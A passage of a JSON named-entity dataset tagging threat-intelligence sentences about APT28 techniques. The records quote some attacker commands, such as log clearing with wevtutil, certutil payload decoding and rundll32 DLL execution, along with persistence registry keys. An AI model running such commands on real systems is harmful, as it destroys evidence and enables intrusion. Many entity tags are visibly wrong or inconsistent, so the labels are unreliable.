] }, { "tokens": [ "APT28", "has", "used", "several", "malicious", "applications", "that", "abused", "OAuth", "access", "tokens", "to", "gain", "access", "to", "target", "email", "accounts,", "including", "Gmail", "and", "Yahoo", "Mail." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Idus" ] }, { "tokens": [ "APT28", "used", "a", "publicly", "available", "tool", "to", "gather", "and", "compress", "multiple", "documents", "on", "the", "DCCC", "and", "DNC", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "has", "used", "a", "variety", "of", "utilities,", "including", "WinRAR,", "to", "archive", "collected", "data", "with", "password", "protection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "used", "a", "publicly", "available", "tool", "to", "gather", "and", "compress", "multiple", "documents", "on", "the", "DCCC", "and", "DNC", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "has", "used", "Google", "Drive", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "deployed", "a", "bootkit", "along", "with", "Downdelph", "to", "ensure", "its", "persistence", "on", "the", "victim.", "The", "bootkit", "shares", "code", "with", "some", "variants", "of", "BlackEnergy." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT28", "can", "perform", "brute", "force", "attacks", "to", "obtain", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "I-Purp", "O" ] }, { "tokens": [ "APT28", "has", "cleared", "event", "logs,", "including", "by", "using", "the", "commands", "<code>wevtutil", "cl", "System</code>", "and", "<code>wevtutil", "cl", "Security</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "compromised", "Office", "365", "service", "accounts", "with", "Global", "Administrator", "privileges", "to", "collect", "email", "from", "user", "inboxes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT28", "uses", "a", "tool", "that", "captures", "information", "from", "air-gapped", "computers", "via", "an", "infected", "USB", "and", "transfers", "it", "to", "network-connected", "computer", "when", "the", "USB", "is", "inserted." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "COM", "hijacking", "for", "persistence", "by", "replacing", "the", "legitimate", "<code>MMDeviceEnumerator</code>", "object", "with", "a", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "harvested", "user's", "login", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "split", "archived", "exfiltration", "files", "into", "chunks", "smaller", "than", "1MB." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "collected", "files", "from", "various", "information", "repositories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "retrieved", "internal", "documents", "from", "machines", "inside", "victim", "environments,", "including", "by", "using", "Forfiles", "to", "stage", "documents", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "collected", "files", "from", "network", "shared", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT28", "backdoor", "may", "collect", "the", "entire", "contents", "of", "an", "inserted", "USB", "device." ], "ner_tags": [ "O", "B-Idus", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT28", "macro", "uses", "the", "command", "<code>certutil", "-decode</code>", "to", "decode", "contents", "of", "a", ".txt", "file", "storing", "the", "base64", "encoded", "payload." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "registered", "domains", "imitating", "NATO,", "OSCE", "security", "websites,", "Caucasus", "information", "resources,", "and", "other", "organizations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "compromised", "targets", "via", "strategic", "web", "compromise", "utilizing", "custom", "exploit", "kits.", "APT28", "used", "reflected", "cross-site", "scripting", "(XSS)", "against", "government", "websites", "to", "redirect", "users", "to", "phishing", "webpages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "has", "delivered", "JHUHUGIT", "and", "Koadic", "by", "executing", "PowerShell", "commands", "through", "DDE", "in", "Word", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "APT28", "has", "used", "compromised", "email", "accounts", "to", "send", "credential", "phishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "encrypted", "a", ".dll", "payload", "using", "RTL", "and", "a", "custom", "encryption", "algorithm.", "APT28", "has", "also", "obfuscated", "payloads", "with", "base64,", "XOR,", "and", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "exfiltrated", "archives", "of", "collected", "data", "previously", "staged", "on", "a", "target's", "OWA", "server", "via", "HTTPS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT28", "can", "exfiltrate", "data", "over", "Google", "Drive." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "a", "variety", "of", "public", "exploits,", "including", "CVE", "2020-0688", "and", "CVE", "2020-17144,", "to", "gain", "execution", "on", "vulnerable", "Microsoft", "Exchange;", "they", "have", "also", "conducted", "SQL", "injection", "attacks", "against", "external", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "exploited", "Microsoft", "Office", "vulnerability", "CVE-2017-0262", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "CVE-2015-4902", "to", "bypass", "security", "features." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "exploited", "CVE-2014-4076,", "CVE-2015-2387,", "CVE-2015-1701,", "CVE-2017-0263", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-Features", "B-Features", "B-Features", "O", "O", "O" ] }, { "tokens": [ "APT28", "exploited", "a", "Windows", "SMB", "Remote", "Code", "Execution", "Vulnerability", "to", "conduct", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Features", "I-Exp", "I-Exp", "I-Exp", "I-Exp", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "used", "other", "victims", "as", "proxies", "to", "relay", "command", "traffic,", "for", "instance", "using", "a", "compromised", "Georgian", "military", "email", "server", "as", "a", "hop", "point", "to", "NATO", "victims.", "The", "group", "has", "also", "used", "a", "tool", "that", "acts", "as", "a", "proxy", "to", "allow", "C2", "even", "if", "the", "victim", "is", "behind", "a", "router.", "APT28", "has", "also", "used", "a", "machine", "to", "relay", "and", "obscure", "communications", "between", "CHOPSTICK", "and", "their", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "Tor", "and", "a", "variety", "of", "commercial", "VPN", "services", "to", "route", "brute", "force", "authentication", "attempts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "APT28", "has", "intentionally", "deleted", "computer", "files", "to", "cover", "their", "tracks,", "including", "with", "use", "of", "the", "program", "CCleaner." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "Forfiles", "to", "locate", "PDF,", "Excel,", "and", "Word", "documents", "during", "collection.", "The", "group", "also", "searched", "a", "compromised", "DCCC", "computer", "for", "specific", "terms." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Tool", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "saved", "files", "with", "hidden", "file", "attributes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "the", "WindowStyle", "parameter", "to", "conceal", "PowerShell", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "downloaded", "additional", "files,", "including", "by", "using", "a", "first-stage", "downloader", "to", "contact", "the", "C2", "server", "to", "obtain", "the", "second-stage", "implant." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "added", "\"junk", "data\"", "to", "each", "encoded", "string,", "preventing", "trivial", "decoding", "without", "knowledge", "of", "the", "junk", "removal", "algorithm.", "Each", "implant", "was", "given", "a", "\"junk", "length\"", "value", "when", "created,", "tracked", "by", "the", "controller", "software", "to", "allow", "seamless", "communication", "but", "prevent", "analysis", "of", "the", "command", "protocol", "on", "the", "wire." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "tools", "to", "perform", "keylogging." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "regularly", "deploys", "both", "publicly", "available", "(ex:", "Mimikatz)", "and", "custom", "password", "retrieval", "tools", "on", "victims.", "They", "have", "also", "dumped", "the", "LSASS", "process", "memory", "using", "the", "MiniDump", "function." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "has", "stored", "captured", "credential", "information", "in", "a", "file", "named", "pi.log." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "An", "APT28", "loader", "Trojan", "adds", "the", "Registry", "key", "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", "to", "establish", "persistence." ], "ner_tags": [ "O", "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "IMAP,", "POP3,", "and", "SMTP", "for", "a", "communication", "channel", "in", "various", "implants,", "including", "using", "self-registered", "Google", "Mail", "accounts", "and", "later", "compromised", "email", "servers", "of", "its", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "attempted", "to", "get", "users", "to", "click", "on", "Microsoft", "Office", "attachments", "containing", "malicious", "macro", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "tricked", "unwitting", "recipients", "into", "clicking", "on", "malicious", "hyperlinks", "within", "emails", "crafted", "to", "resemble", "trustworthy", "senders." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "renamed", "the", "WinRAR", "utility", "to", "avoid", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "changed", "extensions", "on", "files", "containing", "exfiltrated", "data", "to", "make", "them", "appear", "benign,", "and", "renamed", "a", "web", "shell", "instance", "to", "appear", "as", "a", "legitimate", "OWA", "page." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "routed", "traffic", "over", "Tor", "and", "VPN", "servers", "to", "obfuscate", "their", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "APT28", "has", "used", "the", "ntdsutil.exe", "utility", "to", "export", "the", "Active", "Directory", "database", "for", "credential", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "2016,", "APT28", "conducted", "a", "distributed", "denial", "of", "service", "(DDoS)", "attack", "against", "the", "World", "Anti-Doping", "Agency." ], "ner_tags": [ "O", "B-Time", "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "B-Way", "B-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "compromised", "Ubiquiti", "network", "devices", "to", "act", "as", "collection", "devices", "for", "credentials", "compromised", "via", "phishing", "webpages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "deployed", "the", "open", "source", "tool", "Responder", "to", "conduct", "NetBIOS", "Name", "Service", "poisoning,", "which", "captured", "usernames", "and", "hashed", "passwords", "that", "allowed", "access", "to", "legitimate", "credentials.", "APT28", "close-access", "teams", "have", "used", "Wi-Fi", "pineapples", "to", "intercept", "Wi-Fi", "signals", "and", "user", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "regularly", "deploys", "both", "publicly", "available", "(ex:", "Mimikatz)", "and", "custom", "password", "retrieval", "tools", "on", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "the", "Office", "Test", "persistence", "mechanism", "within", "Microsoft", "Office", "by", "adding", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Office", "test\\Special\\Perf</code>", "to", "execute", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "pass", "the", "hash", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "a", "brute-force/password-spray", "tooling", "that", "operated", "in", "two", "modes:", "in", "brute-force", "mode", "it", "typically", "sent", "over", "300", "authentication", "attempts", "per", "hour", "per", "targeted", "account", "over", "the", "course", "of", "several", "hours", "or", "days.", "APT28", "has", "also", "used", "a", "Kubernetes", "cluster", "to", "conduct", "distributed,", "large-scale", "password", "guessing", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "I-Way", "I-Way", "B-OffAct" ] }, { "tokens": [ "APT28", "has", "used", "a", "brute-force/password-spray", "tooling", "that", "operated", "in", "two", "modes:", "in", "password-spraying", "mode", "it", "conducted", "approximately", "four", "authentication", "attempts", "per", "hour", "per", "targeted", "account", "over", "the", "course", "of", "several", "days", "or", "weeks.", "APT28", "has", "also", "used", "a", "Kubernetes", "cluster", "to", "conduct", "distributed,", "large-scale", "password", "spray", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "I-Way", "I-Way", "B-OffAct" ] }, { "tokens": [ "APT28", "uses", "a", "module", "to", "receive", "a", "notification", "every", "time", "a", "USB", "mass", "storage", "device", "is", "inserted", "into", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "spearphishing", "to", "compromise", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT28", "downloads", "and", "executes", "PowerShell", "scripts", "and", "performs", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "B-Features", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT28", "loader", "Trojan", "will", "enumerate", "the", "victim's", "processes", "searching", "for", "explorer.exe", "if", "its", "current", "process", "does", "not", "have", "necessary", "permissions." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "deployed", "malware", "that", "has", "copied", "itself", "to", "the", "startup", "directory", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "staged", "archives", "of", "collected", "data", "on", "a", "target's", "Outlook", "Web", "Access", "(OWA)", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "collected", "emails", "from", "victim", "Microsoft", "Exchange", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "uses", "a", "tool", "to", "infect", "connected", "USB", "devices", "and", "transmit", "itself", "to", "air-gapped", "computers", "when", "the", "infected", "USB", "device", "is", "inserted." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "a", "UEFI", "(Unified", "Extensible", "Firmware", "Interface)", "rootkit", "known", "as", "LoJax." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT28", "executed", "CHOPSTICK", "by", "using", "rundll32", "commands", "such", "as", "<code>rundll32.exe", "“C:\\Windows\\twain_64.dll”</code>.", "APT28", "also", "executed", "a", ".dll", "for", "a", "first", "stage", "dropper", "using", "rundll32.exe.", "An", "APT28", "loader", "Trojan", "saved", "a", "batch", "script", "that", "uses", "rundll32", "to", "execute", "a", "DLL", "payload." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "B-SamFile", "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "mapped", "network", "drives", "using", "Net", "and", "administrator", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "APT28", "has", "used", "tools", "to", "take", "screenshots", "from", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "collected", "information", "from", "Microsoft", "SharePoint", "services", "within", "target", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "sent", "spearphishing", "emails", "containing", "malicious", "Microsoft", "Office", "and", "RAR", "attachments." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "sent", "spearphishing", "emails", "which", "used", "a", "URL-shortener", "service", "to", "masquerade", "as", "a", "legitimate", "service", "and", "to", "redirect", "targets", "to", "credential", "harvesting", "sites." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "B-Purp", "O" ] }, { "tokens": [ "APT28", "has", "conducted", "credential", "phishing", "campaigns", "with", "embedded", "links", "to", "attacker-controlled", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "several", "malicious", "applications", "to", "steal", "user", "OAuth", "access", "tokens", "including", "applications", "masquerading", "as", "\"Google", "Defender\"", "\"Google", "Email", "Protection,\"", "and", "\"Google", "Scanner\"", "for", "Gmail", "users.", "They", "also", "targeted", "Yahoo", "users", "with", "applications", "masquerading", "as", "\"Delivery", "Service\"", "and", "\"McAfee", "Email", "Protection\"." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SecTeam", "O", "B-Org", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "O" ] }, { "tokens": [ "APT28", "installed", "a", "Delphi", "backdoor", "that", "used", "a", "custom", "algorithm", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "APT28", "used", "weaponized", "Microsoft", "Word", "documents", "abusing", "the", "remote", "template", "function", "to", "retrieve", "a", "malicious", "macro." ], "ner_tags": [ "B-Idus", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "performed", "timestomping", "on", "victim", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "CVE-2015-1701", "to", "access", "the", "SYSTEM", "token", "and", "copy", "it", "into", "the", "current", "process", "as", "part", "of", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "obtained", "and", "used", "open-source", "tools", "like", "Koadic,", "Mimikatz,", "and", "Responder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Once", "APT28", "gained", "access", "to", "the", "DCCC", "network,", "the", "group", "then", "proceeded", "to", "use", "that", "access", "to", "compromise", "the", "DNC", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT28", "has", "used", "legitimate", "credentials", "to", "gain", "initial", "access,", "maintain", "access,", "and", "exfiltrate", "data", "from", "a", "victim", "network.", "The", "group", "has", "specifically", "used", "credentials", "stolen", "through", "a", "spearphishing", "email", "to", "login", "to", "the", "DCCC", "network.", "The", "group", "has", "also", "leveraged", "default", "manufacturer's", "passwords", "to", "gain", "initial", "access", "to", "corporate", "networks", "via", "IoT", "devices", "such", "as", "a", "VOIP", "phone,", "printer,", "and", "video", "decoder." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "I-Purp", "I-Purp", "O", "I-Purp", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "hosted", "phishing", "domains", "on", "free", "services", "for", "brief", "periods", "of", "time", "during", "campaigns." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "APT28", "has", "performed", "large-scale", "scans", "in", "an", "attempt", "to", "find", "vulnerable", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Later", "implants", "used", "by", "APT28,", "such", "as", "CHOPSTICK,", "use", "a", "blend", "of", "HTTP,", "HTTPS,", "and", "other", "legitimate", "channels", "for", "C2,", "depending", "on", "module", "configuration." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "newly-created", "Blogspot", "pages", "for", "credential", "harvesting", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Purp", "O" ] }, { "tokens": [ "APT28", "has", "used", "a", "modified", "and", "obfuscated", "version", "of", "the", "reGeorg", "web", "shell", "to", "maintain", "persistence", "on", "a", "target's", "Outlook", "Web", "Access", "(OWA)", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT28", "loader", "Trojan", "uses", "a", "cmd.exe", "and", "batch", "script", "to", "run", "its", "payload.", "The", "group", "has", "also", "used", "macros", "to", "execute", "payloads." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "used", "sticky-keys", "to", "obtain", "unauthenticated,", "privileged", "console", "access." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "a", "compromised", "global", "administrator", "account", "in", "Azure", "AD", "to", "backdoor", "a", "service", "principal", "with", "`ApplicationImpersonation`", "rights", "to", "start", 